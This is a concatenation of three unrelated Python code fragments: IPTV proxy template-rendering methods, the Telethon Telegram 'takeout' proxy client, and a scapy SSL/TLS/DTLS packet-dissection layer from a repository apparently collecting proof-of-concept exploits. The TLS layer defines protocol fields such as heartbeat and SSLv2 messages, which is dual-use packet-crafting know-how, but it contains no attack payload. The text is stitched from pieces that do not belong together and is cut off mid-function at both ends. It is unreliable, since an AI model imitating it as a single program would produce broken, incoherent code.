provider_map_class.constants_class().PROVIDER_NAME[1:],
)
}
return iptv_proxy_script_configuration_xstream_provider_declarations_template.render(
iptv_proxy_script_configuration_xstream_provider_declarations_template_fields
).split(
'\n'
)
@classmethod
def render_iptv_proxy_script_configuration_init_template(cls, environment):
provider_map_class = ProvidersController.get_provider_map_class(
cls._provider_name
)
iptv_proxy_script_configuration_xstream_provider_init_template = environment.get_template(
'iptv_proxy_script_configuration_xstream_provider_init.js'
)
iptv_proxy_script_configuration_xstream_provider_init_template_fields = {
'provider_name_camel_case': '{0}{1}'.format(
provider_map_class.constants_class().PROVIDER_NAME[0].lower(),
provider_map_class.constants_class().PROVIDER_NAME[1:],
)
}
return iptv_proxy_script_configuration_xstream_provider_init_template.render(
iptv_proxy_script_configuration_xstream_provider_init_template_fields
).split('\n')
@classmethod
def render_iptv_proxy_script_configuration_reset_template(cls, environment):
provider_map_class = ProvidersController.get_provider_map_class(
cls._provider_name
)
iptv_proxy_script_configuration_xstream_provider_reset_template = environment.get_template(
'iptv_proxy_script_configuration_xstream_provider_reset.js'
)
iptv_proxy_script_configuration_xstream_provider_reset_template_fields = {
'provider_name_camel_case': '{0}{1}'.format(
provider_map_class.constants_class().PROVIDER_NAME[0].lower(),
provider_map_class.constants_class().PROVIDER_NAME[1:],
),
'provider_name_snake_case': cls._provider_name.lower(),
}
return iptv_proxy_script_configuration_xstream_provider_reset_template.render(
iptv_proxy_script_configuration_xstream_provider_reset_template_fields
).split('\n')
@classmethod
def render_iptv_proxy_script_configuration_update_template(cls, environment):
provider_map_class = ProvidersController.get_provider_map_class(
cls._provider_name
)
iptv_proxy_script_configuration_xstream_provider_update_template = environment.get_template(
'iptv_proxy_script_configuration_xstream_provider_update.js'
)
iptv_proxy_script_configuration_xstream_provider_update_template_fields = {
'provider_name_camel_case': '{0}{1}'.format(
provider_map_class.constants_class().PROVIDER_NAME[0].lower(),
provider_map_class.constants_class().PROVIDER_NAME[1:],
),
'provider_name_snake_case': cls._provider_name.lower(),
}
return iptv_proxy_script_configuration_xstream_provider_update_template.render(
iptv_proxy_script_configuration_xstream_provider_update_template_fields
).split('\n')
|
import functools
import inspect
from .users import UserMethods, _NOT_A_REQUEST
from .. import utils
from ..tl import functions, TLRequest
class _TakeoutClient:
"""
Proxy object over the client. `c` is the client, `k` it's class,
`r` is the takeout request, and `t` is the takeout ID.
"""
def __init__(self, client, request):
# We're a proxy object with __getattribute__overrode so we
# need to set attributes through the super class `object`.
super().__setattr__('c', client)
super().__setattr__('k', client.__class__)
super().__setattr__('r', request)
super().__setattr__('t', None)
def __enter__(self):
# We also get self attributes through super()
if super().__getattribute__('c').loop.is_running():
raise RuntimeError(
'You must use "async with" if the event loop '
'is running (i.e. you are inside an "async def")'
)
return super().__getattribute__(
'c').loop.run_until_complete(self.__aenter__())
async def __aenter__(self):
# Enter/Exit behaviour is "overrode", we don't want to call start
cl = super().__getattribute__('c')
super().__setattr__('t', (await cl(super().__getattribute__('r'))).id)
return self
def __exit__(self, *args):
return super().__getattribute__(
'c').loop.run_until_complete(self.__aexit__(*args))
async def __aexit__(self, *args):
super().__setattr__('t', None)
async def __call__(self, request, ordered=False):
takeout_id = super().__getattribute__('t')
if takeout_id is None:
raise ValueError('Cannot call takeout methods outside of "with"')
single = not utils.is_list_like(request)
requests = ((request,) if single else request)
wrapped = []
for r in requests:
if not isinstance(r, TLRequest):
raise _NOT_A_REQUEST
await r.resolve(self, utils)
wrapped.append(functions.InvokeWithTakeoutRequest(takeout_id, r))
return await super().__getattribute__('c')(
wrapped[0] if single else wrapped, ordered=ordered)
def __getattribute__(self, name):
if name[:2] == '__':
# We want to override special method names
return super().__getattribute__(name)
value = getattr(super().__getattribute__('c'), name)
if inspect.ismethod(value):
# Emulate bound methods behaviour by partially applying
# our proxy class as the self parameter instead of the client
return functools.partial(
getattr(super().__getattribute__('k'), name), self)
else:
return value
def __setattr__(self, name, value):
setattr(super().__getattribute__('c'), name, value)
class AccountMethods(UserMethods):
def takeout(
self, contacts=None, users=None, chats=None, megagroups=None,
channels=None, files=None, max_file_size=None):
"""
Creates a proxy object over the current :ref:`TelegramClient` through
which making requests will use :tl:`InvokeWithTakeoutRequest` to wrap
them. In other words, returns the current client modified so that
requests are done as a takeout:
>>> from telethon.sync import TelegramClient
>>>
>>> with TelegramClient(...) as client:
>>> with client.takeout() as takeout:
>>> client.get_messages('me') # normal call
>>> takeout.get_messages('me') # wrapped through takeout
Some of the calls made through the takeout session will have lower
flood limits. This is useful if you want to export the data from
conversations or mass-download media, since the rate limits will
be lower. Only some requests will be affected, and you will need
to adjust the `wait_time` of methods like `client.iter_messages
<telethon.client.messages.MessageMethods.iter_messages>`.
By default, all parameters are ``False``, and you need to enable
those you plan to use by setting them to ``True``.
You should ``except errors.TakeoutInitDelayError as e``, since this
exception will raise depending on the condition of the session. You
can then access ``e.seconds`` to know how long you should wait for
before calling the method again.
Args:
contacts (`bool`):
Set to ``True`` if you plan on downloading contacts.
users (`bool`):
Set to ``True`` if you plan on downloading information
from users and their private conversations with you.
chats (`bool`):
Set to ``True`` if you plan on downloading information
from small group chats, such as messages and media.
megagroups (`bool`):
Set to ``True`` if you plan on downloading information
from megagroups (channels), such as messages and media.
channels (`bool`):
Set to ``True`` if you plan on downloading information
from broadcast channels, such as messages and media.
files (`bool`):
Set to ``True`` if you plan on downloading media and
you don't only wish to export messages.
max_file_size (`int`):
The maximum file size, in bytes, that you plan
to download for each message with media.
"""
return _TakeoutClient(self, functions.account.InitTakeoutSessionRequest(
contacts=contacts,
message_users=users,
message_chats=chats,
message_megagroups=megagroups,
message_channels=channels,
files=files,
file_max_size=max_file_size
))
|
<reponame>csadsl/poc_exp
#! /usr/bin/env python
# -*- coding: UTF-8 -*-
# Author : <EMAIL> <github.com/tintinweb>
# http://www.secdev.org/projects/scapy/doc/build_dissect.html
from scapy.packet import Packet, bind_layers
from scapy.fields import *
from scapy.layers.inet import TCP, UDP
import os, time
class BLenField(LenField):
def __init__(self, name, default, fmt="I", adjust_i2m=lambda pkt, x:x, numbytes=None, length_of=None, count_of=None, adjust_m2i=lambda pkt, x:x):
self.name = name
self.adjust_i2m = adjust_i2m
self.adjust_m2i = adjust_m2i
self.numbytes = numbytes
self.length_of = length_of
self.count_of = count_of
LenField.__init__(self, name, default, fmt)
if fmt[0] in "@=<>!":
self.fmt = fmt
else:
self.fmt = "!" + fmt
self.default = self.any2i(None, default)
self.sz = struct.calcsize(self.fmt) if not numbytes else numbytes
self.owners = []
def addfield(self, pkt, s, val):
"""Add an internal value to a string"""
pack = struct.pack(self.fmt, self.i2m(pkt, val))
if self.numbytes:
pack = pack[len(pack) - self.numbytes:]
return s + pack
def getfield(self, pkt, s):
"""Extract an internal value from a string"""
upack_data = s[:self.sz]
# prepend struct.calcsize()-len(data) bytes to satisfy struct.unpack
upack_data = '\x00' * (struct.calcsize(self.fmt) - self.sz) + upack_data
return s[self.sz:], self.m2i(pkt, struct.unpack(self.fmt, upack_data)[0])
def i2m(self, pkt, x):
if x is None:
if not (self.length_of or self.count_of):
x = len(pkt.payload)
x = self.adjust_i2m(pkt, x)
return x
if self.length_of is not None:
fld, fval = pkt.getfield_and_val(self.length_of)
f = fld.i2len(pkt, fval)
else:
fld, fval = pkt.getfield_and_val(self.count_of)
f = fld.i2count(pkt, fval)
x = self.adjust_i2m(pkt, f)
return x
def m2i(self, pkt, x):
return self.adjust_m2i(pkt, x)
class XBLenField(BLenField):
def i2repr(self, pkt, x):
return lhex(self.i2h(pkt, x))
class XLenField(LenField):
def i2repr(self, pkt, x):
return lhex(self.i2h(pkt, x))
class XFieldLenField(FieldLenField):
def i2repr(self, pkt, x):
return lhex(self.i2h(pkt, x))
class BEnumField(EnumField):
def __init__(self, name, default, enum, fmt="!I", numbytes=None):
EnumField.__init__(self, name, default, enum, fmt)
self.numbytes = numbytes
self.name = name
if fmt[0] in "@=<>!":
self.fmt = fmt
else:
self.fmt = "!" + fmt
self.default = self.any2i(None, default)
self.sz = struct.calcsize(self.fmt) if not numbytes else numbytes
self.owners = []
def addfield(self, pkt, s, val):
"""Add an internal value to a string"""
pack = struct.pack(self.fmt, self.i2m(pkt, val))
if self.numbytes:
pack = pack[len(pack) - self.numbytes:]
return s + pack
def getfield(self, pkt, s):
"""Extract an internal value from a string"""
upack_data = s[:self.sz]
# prepend struct.calcsize()-len(data) bytes to satisfy struct.unpack
upack_data = '\x00' * (struct.calcsize(self.fmt) - self.sz) + upack_data
return s[self.sz:], self.m2i(pkt, struct.unpack(self.fmt, upack_data)[0])
def i2repr_one(self, pkt, x):
if self not in conf.noenum and not isinstance(x, VolatileValue) and x in self.i2s:
return self.i2s[x]
return lhex(x)
class XBEnumField(BEnumField):
def i2repr(self, pkt, x):
return lhex(self.i2h(pkt, x))
TLS_VERSIONS = { 0x0002:"SSL_2_0",
0x0300:"SSL_3_0",
0x0301:"TLS_1_0",
0x0302:"TLS_1_1",
0x0303:"TLS_1_2",
0x0100:"PROTOCOL_DTLS_1_0_OPENSSL_PRE_0_9_8f",
0xfeff:"DTLS_1_0",
0xfefd:"DTLS_1_1",
}
TLS_CONTENT_TYPES = {0x14:"change_cipher_spec",
0x15:"alert",
0x16:"handshake",
0x17:"application_data",
0x18:"heartbeat",
0xff:"unknown"}
TLS_HANDSHAKE_TYPES = {0x00:"hello_request",
0x01:"client_hello",
0x02:"server_hello",
0x0b:"certificate",
0x0c:"server_key_exchange",
0x0d:"certificate_request",
0x0e:"server_hello_done",
0x0f:"certificate_verify",
0x10:"client_key_exchange",
0x20:"finished",
0x21:"certificate_url",
0x22:"certificate_stats",
0xff:"unknown"}
TLS_EXTENSION_TYPES = {
0x0000:"server_name",
0x0001:"max_fragment_length",
0x0002:"client_certificate_url",
0x0003:"trusted_ca_keys",
0x0004:"truncated_hmac",
0x0005:"status_request",
0x000a:"elliptic_curves",
0x000b:"ec_point_formats",
0x000d:"signature_algorithms",
0x000f:"heartbeat",
0x0023:"session_ticket_tls",
0x3374:"next_protocol_negotiation",
0xff01:"renegotiationg_info",
}
TLS_ALERT_LEVELS = { 0x01: "warning",
0x02: "fatal",
0xff: "unknown", }
TLS_ALERT_DESCRIPTIONS = {
0:"CLOSE_NOTIFY",
10:"UNEXPECTE_MESSAGE",
20:"BAD_RECORD_MAC",
21:"DESCRIPTION_FAILED_RESERVED",
22:"RECORD_OVERFLOW",
30:"DECOMPRESSION_FAILURE",
40:"HANDSHAKE_FAILURE",
41:"NO_CERTIFICATE_RESERVED",
43:"BAD_CERTIFICATE",
43:"UNSUPPORTED_CERTIFICATE",
44:"CERTIFICATE_REVOKED",
45:"CERTIFICATE_EXPIRED",
46:"CERTIFICATE_UNKNOWN",
47:"ILLEGAL_PARAMETER",
48:"UNKNOWN_CA",
49:"ACCESS_DENIED",
50:"DECODE_ERROR",
51:"DECRYPT_ERROR",
60:"EXPORT_RESTRICTION_RESERVED",
70:"PROTOCOL_VERSION",
71:"INSUFFICIENT_SECURITY",
86:"INAPPROPRIATE_FALLBACK",
80:"INTERNAL_ERROR",
90:"USER_CANCELED",
100:"NO_RENEGOTIATION",
110:"UNSUPPORTED_EXTENSION",
111:"CERTIFICATE_UNOBTAINABLE",
112:"UNRECOGNIZED_NAME",
113:"BAD_CERTIFICATE_STATUS_RESPNSE",
114:"BAD_CERTIFICATE_HASH_VALUE",
255:"UNKNOWN_255", }
TLS_EXT_MAX_FRAGMENT_LENGTH_ENUM = {
0x01: 2 ** 9,
0x02: 2 ** 10,
0x03: 2 ** 11,
0x04: 2 ** 12,
0xff: 'unknown',
}
class TLSCipherSuite:
'''
make ciphersuites available as class props (autocompletion)
'''
NULL_WITH_NULL_NULL = 0x0000
RSA_WITH_NULL_MD5 = 0x0001
RSA_WITH_NULL_SHA1 = 0x0002
RSA_WITH_NULL_SHA256 = 0x003b
RSA_WITH_3DES_EDE_CBC_SHA = 0x000a
DHE_RSA_WITH_3DES_EDE_CBC_SHA = 0x0016
DHE_DSS_WITH_3DES_EDE_CBC_SHA = 0x0013
RSA_WITH_3DES_EDE_CBC_SHA = 0x000a
DHE_RSA_WITH_AES_128_CBC_SHA = 0x0033
DHE_DSS_WITH_AES_128_CBC_SHA = 0x0032
RSA_WITH_AES_128_CBC_SHA = 0x002f
RSA_WITH_IDEA_CBC_SHA = 0x0007
DHE_DSS_WITH_RC4_128_SHA = 0x0066
RSA_WITH_RC4_128_SHA = 0x0005
RSA_WITH_RC4_128_MD5 = 0x0004
DHE_DSS_EXPORT1024_WITH_DES_CBC_SHA = 0x0063
RSA_EXPORT1024_WITH_DES_CBC_SHA = 0x0062
RSA_EXPORT1024_WITH_RC2_CBC_56_MD5 = 0x0061
DHE_RSA_WITH_DES_CBC_SHA = 0x0015
DHE_DSS_WITH_DES_CBC_SHA = 0x0012
RSA_WITH_DES_CBC_SHA = 0x0009
DHE_DSS_EXPORT1024_WITH_RC4_56_SHA = 0x0065
RSA_EXPORT1024_WITH_RC4_56_SHA = 0x0064
RSA_EXPORT1024_WITH_RC4_56_MD5 = 0x0060
DHE_RSA_EXPORT_WITH_DES40_CBC_SHA = 0x0014
DHE_DSS_EXPORT_WITH_DES40_CBC_SHA = 0x0011
RSA_EXPORT_WITH_DES40_CBC_SHA = 0x0008
RSA_EXPORT_WITH_RC2_CBC_40_MD5 = 0x0006
RSA_EXPORT_WITH_RC4_40_MD5 = 0x0003
RSA_WITH_AES_256_CBC_SHA = 0x0035
DHE_DSS_WITH_AES_256_CBC_SHA = 0x0038
DHE_RSA_WITH_AES_256_CBC_SHA = 0x0039
ECDHE_ECDSA_WITH_AES_256_CBC_SHA = 0xc00a
ECDH_RSA_WITH_AES_256_CBC_SHA = 0xc00f
ECDHE_RSA_WITH_AES_256_CBC_SHA = 0xc014
SRP_SHA_RSA_WITH_AES_256_CBC_SHA = 0xc021
SRP_SHA_DSS_WITH_AES_256_CBC_SHA = 0xc022
DHE_DSS_WITH_CAMELLIA_256_CBC_SHA = 0x0087
DHE_RSA_WITH_CAMELLIA_256_CBC_SHA = 0x0088
ECDH_ECDSA_WITH_AES_256_CBC_SHA = 0xc005
RSA_WITH_CAMELLIA_256_CBC_SHA = 0x0084
TLS_FALLBACK_SCSV = 0x5600
TLS_CIPHER_SUITES = dict((v, k) for k, v in TLSCipherSuite.__dict__.items() if not k.startswith("__"))
class TLSCompressionMethod:
'''
make compression methods available as class props (autocompletion)
'''
NULL = 0x00
DEFLATE = 0x01
TLS_COMPRESSION_METHODS = dict((v, k) for k, v in TLSCompressionMethod.__dict__.items() if not k.startswith("__"))
class TLSRecord(Packet):
name = "TLS Record"
fields_desc = [ByteEnumField("content_type", 0xff, TLS_CONTENT_TYPES),
XShortEnumField("version", 0x0301, TLS_VERSIONS),
XLenField("length", None, fmt="!H"), ]
class TLSCiphertext(Packet):
name = "TLS Ciphertext Fragment"
fields_desc = [ByteEnumField("content_type", 0xff, TLS_CONTENT_TYPES),
XShortEnumField("version", 0x0301, TLS_VERSIONS),
XLenField("length", None, fmt="!H"), ]
class TLSCiphertextDecrypted(Packet):
name = "TLS Ciphertext Decrypted"
fields_desc = [ StrField("data", None, fmt="H")]
class TLSCiphertextMAC(Packet):
name = "TLS Ciphertext MAC"
fields_desc = [ StrField("mac", None, fmt="H")]
class TLSCompressed(Packet):
name = "TLS Compressed Fragment"
fields_desc = [ByteEnumField("content_type", 0xff, TLS_CONTENT_TYPES),
XShortEnumField("version", 0x0301, TLS_VERSIONS),
XLenField("length", None, fmt="!H"), ]
class TLSPlaintext(Packet):
name = "TLS Plaintext"
fields_desc = [ByteEnumField("content_type", 0xff, TLS_CONTENT_TYPES),
XShortEnumField("version", 0x0301, TLS_VERSIONS),
XLenField("length", None, fmt="!H"), ]
class TLSHandshake(Packet):
name = "TLS Handshake"
fields_desc = [ByteEnumField("type", 0xff, TLS_HANDSHAKE_TYPES),
XBLenField("length", None, fmt="!I", numbytes=3), ]
class TLSServerName(Packet):
name = "TLS Servername"
fields_desc = [ByteEnumField("type", 0x00, {0x00:"host"}),
XFieldLenField("length", None, length_of="data", fmt="H"),
StrLenField("data", "", length_from=lambda x:x.length),
]
class TLSServerNameIndication(Packet):
name = "TLS Extension Servername Indication"
fields_desc = [XFieldLenField("length", None, length_of="server_names", fmt="H"),
PacketListField("server_names", None, TLSServerName, length_from=lambda x:x.length),
]
class TLSExtension(Packet):
name = "TLS Extension"
fields_desc = [XShortEnumField("type", 0x0000, TLS_EXTENSION_TYPES),
XLenField("length", None, fmt="!H"),
]
def extract_padding(self, s):
return s[:self.length],s[self.length:]
# https://www.ietf.org/rfc/rfc3546.txt
class TLSExtMaxFragmentLength(Packet):
name = "TLS Extension Max Fragment Length"
fields_desc = [ByteEnumField("max_fragment_length", 0xff, TLS_EXT_MAX_FRAGMENT_LENGTH_ENUM)]
def extract_padding(self, s):
return '', s
CERT_CHAIN_TYPE = { 0x00: 'individual_certs',
0x01: 'pkipath',
0xff: 'unknown'}
TLS_TYPE_BOOLEAN = {0x00: 'false',
0x01: 'true'}
class TLSURLAndOptionalHash(Packet):
name = "TLS Extension Certificate URL/Hash"
fields_desc = [XFieldLenField("url_length", None, length_of="url", fmt="H"),
StrLenField("url", "", length_from=lambda x:x.url_length),
ByteEnumField("hash_present", 0x00, TLS_TYPE_BOOLEAN),
StrLenField("sha1hash", "", length_from=lambda x:20 if x.hash_present else 0), # opaque SHA1Hash[20];
]
class TLSExtCertificateURL(Packet):
name = "TLS Extension Certificate URL"
fields_desc = [ByteEnumField("type", 0xff, CERT_CHAIN_TYPE),
XFieldLenField("length", None, length_of="certificate_urls", fmt="H"),
PacketListField("certificate_urls", None, TLSURLAndOptionalHash, length_from=lambda x:x.length)
]
def extract_padding(self, s):
return '', s
TLS_EXT_EC_POINT_FORMATS = {0x00:'uncompressed',
0x01:'ansiX962_compressed_prime',
0x02:'ansiX962_compressed_char2'}
class TLSExtECPointsFormat(Packet):
name = "TLS Extension EC Points Format"
fields_desc = [
XFieldLenField("length", None, length_of="ec_point_formats", fmt="B"),
FieldListField("ec_point_formats", None, ByteEnumField("ec_point_format", None, TLS_EXT_EC_POINT_FORMATS), length_from=lambda x:x.length),
]
def extract_padding(self, s):
return '', s
TLS_EXT_ELLIPTIC_CURVES = {0x000e:'sect571r1',
}
class TLSExtEllipticCurves(Packet):
name = "TLS Extension Elliptic Curves"
fields_desc = [
XFieldLenField("length", None, length_of="elliptic_curves", fmt="H"),
FieldListField("elliptic_curves", None, ShortEnumField("elliptic_curve", None, TLS_EXT_ELLIPTIC_CURVES), length_from=lambda x:x.length),
]
def extract_padding(self, s):
return '', s
class TLSExtHeartbeat(Packet):
name = "TLS Extension HeartBeat"
fields_desc = [StrFixedLenField("mode", 0x01, 0x01)
]
def extract_padding(self, s):
return '', s
class TLSClientHello(Packet):
name = "TLS Client Hello"
fields_desc = [XShortEnumField("version", 0x0301, TLS_VERSIONS),
IntField("gmt_unix_time", int(time.time())),
StrFixedLenField("random_bytes", os.urandom(28), 28),
XFieldLenField("session_id_length", None, length_of="session_id", fmt="B"),
StrLenField("session_id", '', length_from=lambda x:x.session_id_length),
XFieldLenField("cipher_suites_length", None, length_of="cipher_suites", fmt="H"),
FieldListField("cipher_suites", None, XShortEnumField("cipher", None, TLS_CIPHER_SUITES), length_from=lambda x:x.cipher_suites_length),
XFieldLenField("compression_methods_length", None, length_of="compression_methods", fmt="B"),
FieldListField("compression_methods", None, ByteEnumField("compression", None, TLS_COMPRESSION_METHODS), length_from=lambda x:x.compression_methods_length),
XFieldLenField("extensions_length", None, length_of="extensions", fmt="H"),
PacketListField("extensions", None, TLSExtension, length_from=lambda x:x.extensions_length),
]
class TLSServerHello(Packet):
name = "TLS Server Hello"
fields_desc = [XShortEnumField("version", 0x0301, TLS_VERSIONS),
IntField("gmt_unix_time", int(time.time())),
StrFixedLenField("random_bytes", os.urandom(28), 28),
XFieldLenField("session_id_length", None, length_of="session_id", fmt="B"),
StrLenField("session_id", '', length_from=lambda x:x.session_id_length),
XShortEnumField("cipher_suite", 0x0000, TLS_CIPHER_SUITES),
ByteEnumField("compression_method", 0x00, TLS_COMPRESSION_METHODS),
XFieldLenField("extensions_length", None, length_of="extensions", fmt="H"),
PacketListField("extensions", None, TLSExtension, length_from=lambda x:x.extensions_length),
]
class TLSAlert(Packet):
name = "TLS Alert"
fields_desc = [ByteEnumField("level", 0xff, TLS_ALERT_LEVELS),
ByteEnumField("description", 0xff, TLS_ALERT_DESCRIPTIONS),
]
class TLSHeartBeat(Packet):
name = "TLS Extension HeartBeat"
fields_desc = [ByteEnumField("type", 0x01, {0x01:"request"}),
FieldLenField("length", None, length_of="data", fmt="H"),
StrLenField("data", "", length_from=lambda x:x.length),
StrLenField("padding", "", length_from=lambda x: 'P' * (16 - x.length)),
]
class TLSClientKeyExchange(Packet):
name = "TLS Client Key Exchange"
fields_desc = [ XBLenField("length", None, fmt="!H",) ]
class TLSServerKeyExchange(Packet):
name = "TLS Client Key Exchange"
fields_desc = [ XBLenField("length", None, fmt="!H") ]
class TLSKexParamEncryptedPremasterSecret(Packet):
name = "TLS Kex encrypted PreMasterSecret"
fields_desc = [ # FieldLenField("length",None,length_of="data",fmt="H"),
StrLenField("data", None) ]
class TLSKexParamDH(Packet):
name = "TLS Kex DH Params"
fields_desc = [ # FieldLenField("length",None,length_of="data",fmt="H"),
StrLenField("data", None) ]
class TLSFinished(Packet):
name = "TLS Handshake Finished"
fields_desc = [ # FieldLenField("length",None,length_of="data",fmt="H"),
StrLenField("data", None) ]
def xbuild(self, master_secret, finished_label, hash_handshake_messages):
'''
master_secret
finished_label = ['client finished','server finished']
hash_handshake_messages
'''
self.data = ssl_tls_crypto.prf(master_secret, finished_label, hash_handshake_messages)
class TLSDHServerParams(Packet):
name = "TLS Diffie-Hellman Server Params"
fields_desc = [XFieldLenField("p_length", None, length_of="p", fmt="!H"),
StrLenField("p", '', length_from=lambda x:x.p_length),
XFieldLenField("g_length", None, length_of="g", fmt="!H"),
StrLenField("g", '', length_from=lambda x:x.g_length),
XFieldLenField("pubkey_length", None, length_of="pubkey", fmt="!H"),
StrLenField("pubkey", '', length_from=lambda x:x.pubkey_length),
XFieldLenField("signature_length", None, length_of="signature", fmt="!H"),
StrLenField("signature", '', length_from=lambda x:x.signature_length), ]
class TLSServerHelloDone(Packet):
name = "TLS Server Hello Done"
fields_desc = [ XBLenField("length", None, fmt="!I", numbytes=3),
StrLenField("data", "", length_from=lambda x:x.length), ]
class TLSCertificate(Packet):
name = "TLS Certificate"
fields_desc = [ XBLenField("length", None, length_of="data", fmt="!I", numbytes=3),
StrLenField("data", "", length_from=lambda x:x.length), ] # BERcodec_Object.dec(data,context=ASN1_Class_X509)
def extract_padding(self,s):
return s[self.length:],s[:self.length]
class TLSCertificateList(Packet):
name = "TLS Certificate List"
fields_desc = [
XBLenField("length", None, length_of="certificates", fmt="!I", numbytes=3),
PacketListField("certificates", None, TLSCertificate, length_from=lambda x:x.length),
]
def extract_padding(self,s):
return s[self.length:],s[:self.length]
class TLSChangeCipherSpec(Packet):
name = "TLS ChangeCipherSpec"
fields_desc = [ StrField("message", '\x01', fmt="H")]
class xTLSCiphertext(Packet):
name = "TLS Ciphertext"
fields_desc = [ StrField("data", None, fmt="H"),
StrField("mac", None, fmt="H")]
def encrypt(self, record):
# t = record[TLSRecord]
# compute MAC
# encrypt DATA+MAC
self.data = str(record)
return self
def decrypt(self):
return TLSRecord()
class xTLSPlaintext(Packet):
name = "TLS Plaintext"
fields_desc = [ StrField("data", None, fmt="H") ]
ptr_methods = {'default': {'encode': lambda x:x, # NULL
'decode': lambda x:x},
TLSCompressionMethod.DEFLATE: {'encode': lambda x:x.encode('zlib'),
'decode': lambda x:x.decode('zlib')},
}
def compress(self, method, data=None):
self.method = method
data = data or self.data
return TLSCompressed(self.ptr_methods.get(self.method, self.ptr_methods['default'])['encode'](data))
class xTLSCompressed(Packet):
name = "TLS Compressed"
fields_desc = [ StrField("data", None, fmt="H") ]
ptr_methods = {'default': {'encode': lambda x:x,
'decode': lambda x:x},
TLSCompressionMethod.DEFLATE: {'encode': lambda x:x.encode('zlib'),
'decode': lambda x:x.decode('zlib')},
}
def decompress(self, method, data=None):
self.method = method
data = data or self.data
return TLSRecord(self.ptr_methods.get(self.method, self.ptr_methods['default'])['decode'](data))
class DTLSRecord(Packet):
name = "DTLS Record"
fields_desc = [ByteEnumField("content_type", 0xff, TLS_CONTENT_TYPES),
XShortEnumField("version", 0x0301, TLS_VERSIONS),
ShortField("epoch", None),
XBLenField("sequence", None, fmt="!Q", numbytes=6),
XLenField("length", None, fmt="!H"), ]
class DTLSHandshake(Packet):
name = "DTLS Handshake"
fields_desc = TLSHandshake.fields_desc + [
ShortField("sequence", None),
XBLenField("fragment_offset", None, fmt="!I", numbytes=3),
XBLenField("length", None, fmt="!I", numbytes=3),
]
class DTLSClientHello(Packet):
name = "DTLS Client Hello"
fields_desc = [XShortEnumField("version", 0xfeff, TLS_VERSIONS),
IntField("gmt_unix_time", int(time.time())),
StrFixedLenField("random_bytes", os.urandom(28), 28),
XFieldLenField("session_id_length", None, length_of="session_id", fmt="B"),
StrLenField("session_id", '', length_from=lambda x:x.session_id_length),
XFieldLenField("cookie_length", None, length_of="cookie", fmt="B"),
StrLenField("cookie", '', length_from=lambda x:x.cookie_length),
XFieldLenField("cipher_suites_length", None, length_of="cipher_suites", fmt="H"),
FieldListField("cipher_suites", None, XShortEnumField("cipher", None, TLS_CIPHER_SUITES), length_from=lambda x:x.cipher_suites_length),
XFieldLenField("compression_methods_length", None, length_of="compression_methods", fmt="B"),
FieldListField("compression_methods", None, ByteEnumField("compression", None, TLS_COMPRESSION_METHODS), length_from=lambda x:x.compression_methods_length),
XFieldLenField("extensions_length", None, length_of="extensions", fmt="H"),
PacketListField("extensions", None, TLSExtension, length_from=lambda x:x.extension_length),
]
SSLv2_CERTIFICATE_TYPES = { 0x01: 'x.509'}
class DTLSHelloVerify(Packet):
name = "DTLS Hello Verify"
fields_desc = [XShortEnumField("version", 0xfeff, TLS_VERSIONS),
XFieldLenField("cookie_length", None, length_of="cookie", fmt="B"),
StrLenField("cookie", '', length_from=lambda x:x.cookie_length),
]
SSLv2_MESSAGE_TYPES = {0x01:'client_hello',
0x04: 'server_hello',
0x02: 'client_master_key'}
class SSLv2CipherSuite:
'''
make ciphersuites available as class props (autocompletion)
'''
DES_192_EDE3_CBC_WITH_MD5 = 0x0700c0
IDEA_128_CBC_WITH_MD5 = 0x050080
RC2_CBC_128_CBC_WITH_MD5 = 0x030080
RC4_128_WITH_MD5 = 0x010080
RC4_64_WITH_MD5 = 0x080080
DES_64_CBC_WITH_MD5 = 0x060040
RC2_128_CBC_EXPORT40_WITH_MD5 = 0x040080
RC4_128_EXPORT40_WITH_MD5 = 0x020080
SSL2_CIPHER_SUITES = dict((v, k) for k, v in SSLv2CipherSuite.__dict__.items() if not k.startswith("__"))
class SSLv2Record(Packet):
name = "SSLv2 Record"
fields_desc = [XBLenField("length", None, fmt="!H", adjust_i2m=lambda pkt, x: x + 0x8000 + 1, adjust_m2i=lambda pkt, x:x - 0x8000), # length=halfbyte+byte with MSB(high(1stbyte)) =1 || +1 for lengt(content_type)
ByteEnumField("content_type", 0xff, SSLv2_MESSAGE_TYPES),
]
class SSLv2ClientHello(Packet):
name = "SSLv2 Client Hello"
fields_desc = [
XShortEnumField("version", 0x0002, TLS_VERSIONS),
XFieldLenField("cipher_suites_length", None, length_of="cipher_suites", fmt="H"),
XFieldLenField("session_id_length", None, length_of="session_id", fmt="H"),
XFieldLenField("challenge_length", None, length_of="challenge", fmt="H"),
FieldListField("cipher_suites", None, XBEnumField("cipher", None, SSL2_CIPHER_SUITES, fmt="!I", numbytes=3), length_from=lambda x:x.cipher_suites_length),
StrLenField("session_id", '', length_from=lambda x:x.session_id_length),
StrLenField("challenge", '', length_from=lambda x:x.challenge_length),
]
SSLv2_CERTIFICATE_TYPES = { 0x01: 'x.509'}
class SSLv2ServerHello(Packet):
name = "SSLv2 Server Hello"
fields_desc = [
ByteEnumField("session_id_hit", 0x00, TLS_TYPE_BOOLEAN),
ByteEnumField("certificate_type", 0x01, SSLv2_CERTIFICATE_TYPES),
XShortEnumField("version", 0x0002, TLS_VERSIONS),
XFieldLenField("certificate_length", None, length_of="certificates", fmt="H"),
XFieldLenField("cipher_suites_length", None, length_of="cipher_suites", fmt="H"),
XFieldLenField("connection_id_length", None, length_of="connection_id", fmt="H"),
StrLenField("certificates", '', length_from=lambda x:x.certificate_length),
FieldListField("cipher_suites", None, XBEnumField("cipher", None, SSL2_CIPHER_SUITES, fmt="!I", numbytes=3), length_from=lambda x:x.cipher_suites_length),
StrLenField("connection_id", '', length_from=lambda x:x.connection_id_length),
]
class SSLv2ClientMasterKey(Packet):
name = "SSLv2 Client Master Key"
fields_desc = [
XBEnumField("cipher_suite", 0x0002, SSL2_CIPHER_SUITES, fmt="!I", numbytes=3), # fixme: 3byte wide
XFieldLenField("clear_key_length", None, length_of="clear_key", fmt="H"),
XFieldLenField("encrypted_key_length", None, length_of="encrypted_key", fmt="H"),
XFieldLenField("key_argument_length", None, length_of="key_argument", fmt="H"),
StrLenField("clear_key", '', length_from=lambda x:x.clear_key_length),
StrLenField("encrypted_key", '', length_from=lambda x:x.clear_key_length),
StrLenField("key_argument", '', length_from=lambda x:x.key_argument_length),
]
# entry class
class SSL(Packet):
'''
COMPOUND CLASS for SSL
'''
name = "SSL/TLS"
fields_desc = [PacketListField("records", None, TLSRecord)]
def pre_dissect(self, s):
# figure out if we're UDP or TCP
if self.underlayer and self.underlayer.haslayer(UDP):
self.guessed_next_layer = DTLSRecord
elif ord(s[0]) & 0x80:
